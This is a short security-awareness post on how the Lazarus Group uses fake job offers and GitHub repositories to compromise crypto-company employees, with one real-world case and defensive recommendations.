How Lazarus Group Targets Crypto Companies: A Case Study

Crypto enthusiasts are likely aware that Lazarus is one of the most persistent and dangerous threat actors in the industry. They’ve caused significant damage to numerous individuals, companies, and protocols. But how exactly do they infiltrate? Let’s delve into one of their favorite methods.

Attack Method

Lazarus’s approach is alarmingly straightforward yet highly effective:

1. Initial Contact: The attacker contacts an employee via social media or messaging apps.
2. Bait: They direct the target to a GitHub repository for a job offer, skills test, or bug fix.
3. Compromise: The individual’s device gets infected with malware.
4. Access: The attacker gains entry to the company’s AWS infrastructure.
5. Exploit: They then compromise the company and its users.

Real-World Example

Recently, a conversation led to over $2 million being stolen, showcasing how Lazarus operates today. Here’s a breakdown:

• Double Targeting: Two employees from the same company were contacted via LinkedIn by the same threat actor using a fake persona.
• First Employee: The attacker added the first employee to a private GitHub repo, asked them to run the build, and resolved an error. The device was compromised upon building the code.
• Trust-Building: Despite the compromise, the attacker continued communicating, even sending $100 USDT to the employee to maintain trust.
• Switch Focus: The attacker switched to the second employee after the first moved on. This time, the repo was public, and the conversation was cut short when the employee asked about the impersonated profile.

Key Lessons

• Sophisticated Targets: Lazarus targets everyone — from executives to developers — using various platforms like Telegram, Discord, Email, and Slack.
• Subtle Exploitation: The interactions seem benign, with theft occurring months later, making it hard to detect the initial breach.

Recommendations

To safeguard against such sophisticated attacks, consider the following:

• Eliminate Single Points of Failure: Distribute responsibilities and access.
• Use Hardware Wallets and MFA: Enhance security with physical devices.
• Avoid Running Unknown Code: Be cautious with code from unknown sources.
• Separate Devices for Communication and Crypto Access: Minimize risk exposure.
• Continuous Learning: Stay informed and educate your team regularly.
• Maintain Skepticism: Always question unexpected interactions.

Conclusion

The Lazarus Group’s methods are evolving, and their attacks are increasingly sophisticated. By understanding their tactics and implementing robust security practices, you can better protect yourself and your organization from such threats. Stay vigilant, stay educated, and always be skeptical.

Stay safe and informed. 💖